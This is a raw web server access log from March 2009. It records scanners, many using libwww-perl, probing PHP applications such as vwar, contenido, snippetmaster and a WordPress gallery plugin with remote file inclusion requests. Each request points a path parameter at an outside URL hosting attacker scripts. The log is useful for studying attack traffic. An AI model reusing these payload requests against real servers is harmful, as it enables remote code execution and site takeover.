200.160.96.54 - - [06/Mar/2009:23:03:27 -0600] "GET /logs//skysilver/login.tpl.php?theme=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 300 "-""libwww-perl/5.808"
200.160.96.54 - - [06/Mar/2009:23:03:30 -0600] "GET //skysilver/login.tpl.php?theme=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 295 "-""libwww-perl/5.808"
61.110.18.100 - - [06/Mar/2009:23:04:53 -0600] "GET /logs//vwar/admin/admin.php?vwar_root=http://inetimageinc.com/.infects/alb?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
61.110.18.100 - - [06/Mar/2009:23:04:53 -0600] "GET //vwar/admin/admin.php?vwar_root=http://inetimageinc.com/.infects/alb?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
207.58.164.77 - - [06/Mar/2009:23:07:17 -0600] "GET //slogin_lib.inc.php?slogin_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:07:17 -0600] "GET /logs//slogin_lib.inc.php?slogin_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:07:17 -0600] "GET /logs/access_log.1234569600//slogin_lib.inc.php?slogin_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:09:33 -0600] "GET /logs/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:09:33 -0600] "GET /logs/access_log.1234224000/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:09:33 -0600] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:09:33 -0600] "GET /logs/access_log.1234828800/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
70.38.71.140 - - [06/Mar/2009:23:10:56 -0600] "GET /logs//?path%5Bdocroot%5D=http://inetimageinc.com/.infects/alb?? HTTP/1.1" 200 180672 "-""libwww-perl/5.805"
70.38.71.140 - - [06/Mar/2009:23:10:57 -0600] "GET //?path%5Bdocroot%5D=http://inetimageinc.com/.infects/alb?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
209.115.42.145 - - [06/Mar/2009:23:12:35 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://inetimageinc.com/.infects/alb?? HTTP/1.1" 404 306 "-""libwww-perl/5.814"
209.115.42.145 - - [06/Mar/2009:23:12:35 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://inetimageinc.com/.infects/alb?? HTTP/1.1" 404 301 "-""libwww-perl/5.814"
70.38.71.140 - - [06/Mar/2009:23:13:04 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
70.38.71.140 - - [06/Mar/2009:23:13:04 -0600] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
70.38.71.140 - - [06/Mar/2009:23:13:04 -0600] "GET //include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
70.38.71.140 - - [06/Mar/2009:23:13:12 -0600] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:13:48 -0600] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:13:54 -0600] "GET /logs/access_log.1234224000/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:13:54 -0600] "GET /logs/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
207.58.164.77 - - [06/Mar/2009:23:13:54 -0600] "GET /logs/access_log.1234828800/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
67.99.100.113 - - [06/Mar/2009:23:15:09 -0600] "GET /include/lib.inc.php?site_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.99.100.113 - - [06/Mar/2009:23:15:10 -0600] "GET /logs/include/lib.inc.php?site_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.99.100.113 - - [06/Mar/2009:23:15:12 -0600] "GET /logs/access_log.1233878400/include/lib.inc.php?site_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
200.160.96.54 - - [06/Mar/2009:23:16:30 -0600] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 306 "-""libwww-perl/5.808"
200.160.96.54 - - [06/Mar/2009:23:16:30 -0600] "GET /logs/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 311 "-""libwww-perl/5.808"
67.99.100.113 - - [06/Mar/2009:23:17:20 -0600] "GET /logs/access_log.1227571200/include/lib.inc.php?site_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:30 -0600] "GET //?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:32 -0600] "GET /logs//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:37 -0600] "GET /logs/access_log.1232150400//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:50 -0600] "GET /logs/access_log.1234569600//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:51 -0600] "GET /logs/access_log.1231286400//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:52 -0600] "GET /logs/access_log.1234742400//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:53 -0600] "GET /logs/access_log.1233014400//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:53 -0600] "GET /logs/access_log.1233792000//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:57 -0600] "GET /logs/access_log.1234656000//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:57 -0600] "GET /logs/access_log.1234224000//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:57 -0600] "GET /logs/access_log.1233878400//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.19.130.218 - - [06/Mar/2009:23:27:58 -0600] "GET //include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.19.130.218 - - [06/Mar/2009:23:27:58 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.19.130.218 - - [06/Mar/2009:23:27:58 -0600] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:27:59 -0600] "GET /logs/access_log.1231113600//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:28:04 -0600] "GET /logs/access_log.1232064000//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:28:06 -0600] "GET /logs/access_log.1231977600//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.19.130.218 - - [06/Mar/2009:23:28:07 -0600] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:28:11 -0600] "GET /logs/access_log.1233446400//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:28:13 -0600] "GET /logs/access_log.1230595200//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:28:17 -0600] "GET /logs/access_log.1234828800//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:28:19 -0600] "GET /logs/access_log.1234483200//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [06/Mar/2009:23:28:32 -0600] "GET /logs/access_log.1230681600//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
204.14.106.24 - - [06/Mar/2009:23:29:47 -0600] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
204.14.106.24 - - [06/Mar/2009:23:29:48 -0600] "GET //include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
204.14.106.24 - - [06/Mar/2009:23:29:48 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.249.67.180 - - [06/Mar/2009:23:32:25 -0600] "GET / HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.99.100.113 - - [06/Mar/2009:23:32:44 -0600] "GET /includes/ktedit/toolbar.php?dirDepth=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.99.100.113 - - [06/Mar/2009:23:32:45 -0600] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.99.100.113 - - [06/Mar/2009:23:32:51 -0600] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.99.100.113 - - [06/Mar/2009:23:37:18 -0600] "GET /logs/access_log.1232668800/includes/ktedit/toolbar.php?dirDepth=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.19.130.218 - - [06/Mar/2009:23:38:19 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.19.130.218 - - [06/Mar/2009:23:38:19 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.19.130.218 - - [06/Mar/2009:23:38:20 -0600] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.19.130.218 - - [06/Mar/2009:23:40:43 -0600] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
89.111.176.28 - - [06/Mar/2009:23:44:53 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://inetimageinc.com/.infects/alb?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.111.176.28 - - [06/Mar/2009:23:44:53 -0600] "GET //include/admin.lib.inc.php?site_path=http://inetimageinc.com/.infects/alb?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
217.22.60.25 - - [06/Mar/2009:23:47:33 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://racrew.us/sophie/raid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
217.22.60.25 - - [06/Mar/2009:23:47:33 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://racrew.us/sophie/raid.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.812"
217.150.252.76 - - [06/Mar/2009:23:54:21 -0600] "GET //sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://www.2data.nl/images/id/idfeelcomz.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.150.252.76 - - [06/Mar/2009:23:54:21 -0600] "GET /logs/access_log.1230249600//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://www.2data.nl/images/id/idfeelcomz.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.150.252.76 - - [06/Mar/2009:23:54:21 -0600] "GET /logs//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://www.2data.nl/images/id/idfeelcomz.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
198.66.229.68 - - [06/Mar/2009:23:55:54 -0600] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 352 "-""Mozilla/5.0"
198.66.229.68 - - [06/Mar/2009:23:55:54 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 330 "-""Mozilla/5.0"
198.66.229.68 - - [06/Mar/2009:23:55:54 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 325 "-""Mozilla/5.0"
198.66.229.68 - - [06/Mar/2009:23:57:01 -0600] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 352 "-""Mozilla/5.0"
65.55.208.134 - - [06/Mar/2009:23:57:33 -0600] "GET /logs/access_log.1120521600 HTTP/1.1" 200 3206 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
198.66.229.68 - - [07/Mar/2009:00:07:08 -0600] "GET //include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 297 "-""Mozilla/5.0"
198.66.229.68 - - [07/Mar/2009:00:07:08 -0600] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 324 "-""Mozilla/5.0"
198.66.229.68 - - [07/Mar/2009:00:07:08 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 302 "-""Mozilla/5.0"
198.66.229.68 - - [07/Mar/2009:00:07:19 -0600] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 324 "-""Mozilla/5.0"
66.179.175.12 - - [07/Mar/2009:00:32:07 -0600] "GET /logs/lostpasswd.php?env[include_prefix]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
66.179.175.12 - - [07/Mar/2009:00:32:07 -0600] "GET /lostpasswd.php?env[include_prefix]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
70.38.71.140 - - [07/Mar/2009:00:32:13 -0600] "GET //Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
70.38.71.140 - - [07/Mar/2009:00:32:13 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
70.38.71.140 - - [07/Mar/2009:00:32:13 -0600] "GET /logs/access_log.1233187200//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.225.253.109 - - [07/Mar/2009:00:36:47 -0600] "GET /lostpasswd.php?env[include_prefix]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:00:36:47 -0600] "GET /logs/lostpasswd.php?env[include_prefix]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
81.169.162.47 - - [07/Mar/2009:00:39:27 -0600] "GET /logs/comments//admin.php?include_path=http://old.no-mia.com/tjzwjhdtj/pqkewt/id? HTTP/1.1" 404 307 "-""libwww-perl/5.806"
81.169.162.47 - - [07/Mar/2009:00:39:27 -0600] "GET /comments//admin.php?include_path=http://old.no-mia.com/tjzwjhdtj/pqkewt/id? HTTP/1.1" 404 302 "-""libwww-perl/5.806"
208.71.11.51 - - [07/Mar/2009:00:44:06 -0600] "GET /lostpasswd.php?env[include_prefix]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.800"
208.71.11.51 - - [07/Mar/2009:00:44:06 -0600] "GET /logs/lostpasswd.php?env[include_prefix]=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
204.3.159.52 - - [07/Mar/2009:00:44:07 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 300 "-""Mozilla/5.0"
204.3.159.52 - - [07/Mar/2009:00:44:07 -0600] "GET /logs/access_log.1233187200//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 322 "-""Mozilla/5.0"
204.3.159.52 - - [07/Mar/2009:00:44:07 -0600] "GET //Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 295 "-""Mozilla/5.0"
61.110.18.100 - - [07/Mar/2009:00:47:25 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.110.18.100 - - [07/Mar/2009:00:47:25 -0600] "GET /logs/access_log.1233187200//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
61.110.18.100 - - [07/Mar/2009:00:47:25 -0600] "GET //Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.90.36.38 - - [07/Mar/2009:00:49:40 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.90.36.38 - - [07/Mar/2009:00:49:40 -0600] "GET //Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.90.36.38 - - [07/Mar/2009:00:49:40 -0600] "GET /logs/access_log.1233187200//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.254.51.178 - - [07/Mar/2009:00:58:52 -0600] "GET /logs//login.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
65.254.51.178 - - [07/Mar/2009:00:58:53 -0600] "GET //login.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
66.225.253.109 - - [07/Mar/2009:00:59:19 -0600] "GET /logs//login.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:00:59:20 -0600] "GET //login.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
220.225.28.138 - - [07/Mar/2009:01:03:29 -0600] "GET /logs/access_log.1228262400 HTTP/1.0" 200 12042 "http://search.yahoo.com/search?p=cionist&ei=UTF-8&fr=FP-tab-web-t&fl=0&x=wrt""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Alexa Toolbar; .NET CLR 1.1.4322)"
194.177.224.21 - - [07/Mar/2009:01:11:41 -0600] "GET /logs/access_log.1233187200//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
194.177.224.21 - - [07/Mar/2009:01:11:41 -0600] "GET //Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
194.177.224.21 - - [07/Mar/2009:01:11:41 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.55.208.133 - - [07/Mar/2009:01:21:23 -0600] "GET /logs/access_log.1201651200 HTTP/1.1" 200 1151 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [07/Mar/2009:01:24:52 -0600] "GET /logs/access_log.1178323200 HTTP/1.1" 200 1120 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [07/Mar/2009:01:28:58 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.makparty.com//plugins/safehtml/sp.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:01:28:58 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.makparty.com//plugins/safehtml/sp.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:01:29:04 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://britishspeedwaysliders.com/mambots/search/V8.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:01:29:17 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://britishspeedwaysliders.com/mambots/search/V8.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:01:31:13 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://britishspeedwaysliders.com/mambots/search/V8.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:01:31:13 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://britishspeedwaysliders.com/mambots/search/V8.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
213.239.211.250 - - [07/Mar/2009:01:33:05 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
213.239.211.250 - - [07/Mar/2009:01:33:05 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
65.254.51.178 - - [07/Mar/2009:01:33:42 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.814"
65.254.51.178 - - [07/Mar/2009:01:33:42 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.814"
65.254.51.178 - - [07/Mar/2009:01:34:37 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.814"
65.254.51.178 - - [07/Mar/2009:01:34:37 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.814"
66.225.253.109 - - [07/Mar/2009:01:36:29 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:01:36:29 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
66.172.9.3 - - [07/Mar/2009:01:41:09 -0600] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.172.9.3 - - [07/Mar/2009:01:41:09 -0600] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.172.9.3 - - [07/Mar/2009:01:41:09 -0600] "GET /logs/access_log.1233705600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.172.9.3 - - [07/Mar/2009:01:41:11 -0600] "GET /logs/access_log.1233792000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
195.190.166.41 - - [07/Mar/2009:01:51:46 -0600] "GET /logs//login.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.190.166.41 - - [07/Mar/2009:01:51:47 -0600] "GET //login.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.22.60.25 - - [07/Mar/2009:02:00:33 -0600] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
217.22.60.25 - - [07/Mar/2009:02:00:33 -0600] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
65.254.51.178 - - [07/Mar/2009:02:00:33 -0600] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.814"
